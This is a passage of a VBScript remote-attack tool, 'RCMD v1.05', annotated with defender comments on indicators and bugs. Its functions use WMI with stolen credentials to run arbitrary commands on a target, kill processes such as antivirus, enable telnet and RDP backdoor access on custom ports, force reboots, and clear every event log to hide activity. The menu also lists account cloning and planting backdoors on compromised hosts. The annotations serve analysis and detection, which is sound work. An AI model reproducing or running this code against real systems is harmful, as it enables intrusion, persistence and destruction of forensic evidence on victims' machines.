' On the target this appears as a new process whose parent is WmiPrvSE.exe -- the standard
' tell-tale of WMI lateral movement. No output is captured; only the return code and PID come back.
' Note that after an error the code re-enters command() and never reaches the lines below it.
function run()
strcmdline=WScript.StdIn.Readline()
if strcmdline="exit" or strcmdline="quit" or strcmdline="0" then
call main()
end if
outstreem.write "Running the command ...."
set objinstance=objswbemservices.get("win32_process")
set objmethod=objinstance.methods_("create")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=strcmdline
set objoutparam=objinstance.execmethod_("create",objinparam)
if objoutparam.returnvalue<>0 then
wscript.echo "Error!"
call command()
else
wscript.echo "OK!"
end if
wscript.echo "The Process ID is "&objoutparam.processid
wscript.echo "Runing command:"&strcmdline&". to "&ipaddress&" Successfully!"&vbcrlf 
call command()
end function

'*******************************************

' pslist(): lists every Win32_Process on the target as Name / Handle (PID) / ExecutablePath.
' Names shorter than 8 characters get an extra tab for alignment. Read-only.
function pslist()
outstreem.write "Listing process...."
set colinstances=objswbemservices.execquery("select * from win32_process")
showerror(err.number)
wscript.echo vbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"
for each objinstance in colinstances
if len(objinstance.name)<8 then
strname=objinstance.name&chr(9)
else
strname=objinstance.name
end if
wscript.echo strname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath
next
wscript.echo vbcrlf&"All process have been listed Successfully!"
call main()
end function

'*****************************************

' pskill(): terminates the process whose Handle (PID) is typed at the prompt, via
' Win32_Process.Terminate with reason 0. The PID is interpolated into the object path unescaped.
' Typical attacker use is killing AV/EDR or monitoring processes before the other actions;
' the terminate shows up on the target as a WMI-originated process exit.
function pskill()
wscript.echo "plese enter the process's id:"
strprocess=WScript.StdIn.Readline()
outstreem.write "Killing id="&strprocess&" process...."
set objinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")
if vartype(objinstance)<>vbobject then
wscript.echo vbcrlf&"Specified process is not exist."
call main()
else
set objmethod=objinstance.methods_("terminate")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.reason=0
set objoutparam=objinstance.execmethod_("terminate",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo "The process's id="&strprocess&" have been killed Successfully!"
end if
call main()
end function

'********************************************************

' telnet(): toggles the Microsoft Telnet service (tlntsvr) on the target.
'  - If the service is running: stop it.
'  - Otherwise: prompt for an NTLM mode (0-2) and a port, write them to
'    HKLM\SOFTWARE\Microsoft\TelnetServer\1.0 (NTLM, TelnetPort) through StdRegProv.SetDWORDValue,
'    flip a Disabled start mode to Manual, and start the service.
' Indicators: tlntsvr start/stop events, changes to those two registry values, telnet listening on a
' non-23 port. Telnet is clear-text, so the resulting shell (and any credentials typed into it) is
' observable on the wire.
' Quirks left as published: showerror(intstatus) in the else-branch is called before intstatus is
' assigned (Empty -> prints "OK!"); the port is range-checked only for being numeric.
function telnet()
outstreem.write "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
showerror(err.number)
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
outstreem.write "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
outstreem.write "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
showerror(intstatus)
wscript.echo "plese enter the ntlm:"
ntlm=WScript.StdIn.Readline()
wscript.echo "plese enter the port:"
port=WScript.StdIn.Readline()
if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then
wscript.echo "The value of NTML is wrong."
call main()
end if
if not isnumeric(port) then
wscript.echo "The value of port is wrong."
main()
end if
' Registry writes go through a second connection to root/default (where StdRegProv lives).
set objswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)
outstreem.write "Setting NTLM="&ntlm&"...."
set objinstance1=objswbemservices1.get("stdregprov")
set objmethod=objinstance1.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
outstreem.write "Setting port="&port&"...."
' Same parameter object reused: only the value name and value change.
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
intstatus=objinstance.startservice()
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next
call main()
end function

'********************************************************

' rs(): enables Terminal Services (RDP) on the target purely through registry writes, then reboots.
' Only proceeds when the OS caption contains "Server". Writes, via StdRegProv under HKLM:
'   netcache\Enabled=0, Policies\...\Installer\EnableAdminTSRemote=1,
'   Control\Terminal Server\TSEnabled=1, Services\TermDD\Start=2 and Services\TermService\Start=2
'   (2 = automatic start), and WinStations\RDP-Tcp\PortNumber = the chosen port (1-65000).
' Those values -- especially a non-3389 PortNumber and TermService flipping to automatic -- are the
' things to alert on. The change only takes effect after the forced reboot offered at the end.
' Quirks left as published: the first .createkey call has no hive argument (page garbling or a
' bug); the ".DEFAULT\Keyboard Layout\Toggle" path is written under HKLM, although .DEFAULT
' normally lives under HKEY_USERS, so that write presumably creates a stray key or fails silently.
function rs()
outstreem.write "Checking The OS Type ...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else 
wscript.echo "OK!"
wscript.echo "OS Type is "&objinstoscaption.caption
wscript.echo "you cann't open terminal services,canceling...."&chr(13)
call main()
end if 
next
wscript.echo "plese enter the port:"
port=WScript.StdIn.Readline()
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error." 
call main()
end if
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKLM,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)
wscript.echo "Now, you need to reboot target!"
wscript.echo "Do you want to reboot target now ?[y/n]"
strcancel=WScript.StdIn.Readline()
' Anything other than a literal "n" (including an empty line) triggers the forced reboot.
if strcancel="n" then 
wscript.echo "you need to reboot target then!!"
call main() 
else 
call reboot()
end if
wscript.echo "You can logon terminal services on "&port&" later,Good luck!"
call main() 
end Function

'**************************************************************

' clog(): anti-forensics -- calls ClearEventLog on every Win32_NTEventLogFile instance on the target
' (Application, Security, System and any other log). The &h20 flag on ExecQuery appears to be
' wbemFlagForwardOnly. Needs the Security privilege requested at the top of the script.
' Defender note: Windows itself records that a log was cleared into the freshly emptied Security
' log, so a run of this function is detectable precisely by that "log cleared" event; forwarded
' logs (SIEM, WEF) are untouched. On the first non-zero return the loop aborts into main().
function clog()
outstreem.write "Clearing all logs...."
strwqlquery="select * from Win32_NTEventLogFile"
set colinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)
for each objinstance in colinstances
if objinstance.cleareventlog()<>0 then
wscript.echo "Error!"
call main()
end if
next
wscript.echo "OK!"
wscript.echo "All logs have been cleared Successfully!"
call main()
end function

'***************************************************************

' showerror(errornumber): if errornumber is truthy, prints the hex of the global err.number (not
' the argument) and err.description, then re-enters main() and never returns; otherwise prints "OK!".
' Callers pass either err.number or a WMI method return value. In the latter case err.number is
' usually 0, so a failing WMI call is reported as "Error 0x0 ." -- and because of the script-wide
' On Error Resume Next, a stale err.number from an earlier statement may be reported instead.
function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
call main()
else
wscript.echo "OK!"
end if
end function

'*****************************************************************

' usage(): prints the banner and the command-line syntax (targetIP username password).
' The banner strings (tool name, site, contact) are useful as static signatures for this tool.
function usage()
wscript.echo string(79,"*")
wscript.echo "RCMD v1.05"
wscript.echo "Remote execution Script, by 黑嘿黑"
wscript.echo "Welcome to visite www.xyhack.91i.net"
wscript.echo "QQ:123230273 E-mail:[email protected]"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password "
wscript.echo "Then chose the command>"
wscript.echo string(79,"*")
end function

'**********************************************************

' main(): the interactive menu. Reads one line from stdin and dispatches to the matching function.
' Every command function ends by calling main() again (and the error helpers call it too), so the
' script "loops" by recursion and the call stack grows with each command until "quit"/"0" exits.
' An unrecognized entry matches no case; main() then returns to its caller, which is usually the
' previous main() frame's dispatching function.
' Note left as published: the "slist" case reads `list listsvr()` -- the stray "list" token means this
' is not a plain call to listsvr(); it looks like a typing/page error.
function main()
wscript.echo ""
wscript.echo "Now chose the command>"
wscript.echo "0.quit 退出脚本"
wscript.echo "1.telnet 远程开/关telnet"
wscript.echo "2.3389 远程开3389"
wscript.echo "3.clog 远程删除所有日志"
wscript.echo "4.getf 获取肉鸡系统信息"
wscript.echo "5.pslist 例出进程"
wscript.echo "6.pskill 删除进程"
wscript.echo "7.command 远程执行DOS命令"
wscript.echo "8.reboot 远程重启肉鸡"
wscript.echo "9.slist 例出远程肉鸡上的服务信息"
wscript.echo "A.Share 1.列出共享 2.创建共享 3.删除共享"
wscript.echo "B.ca 克隆帐号"
wscript.echo "C.Door 种植后门"
wscript.echo string(79,"*")
wscript.echo "CMD>"
cmd=WScript.StdIn.Readline() 
wscript.echo ""
Select Case cmd
case "telnet" , "1"
telnet()
case "3389" , "2"
rs()
case "clog" , "3"
clog()
case "getf" , "4"
inf()
case "psl" , "pslist" , "5"
pslist()
case "psk" , "pskill" , "6"
pskill()
case "cmd" , "command" , "7"
command()
case "reboot" , "8"
reboot()
case "slist" , "9"
list listsvr()
case "share" , "10" ,"a" ,"A"
share()
case "B" , "b" , "11"
ca()
case "C" , "c" , "12"
door()
case "quit" , "0"
wscript.quit
end select
end function
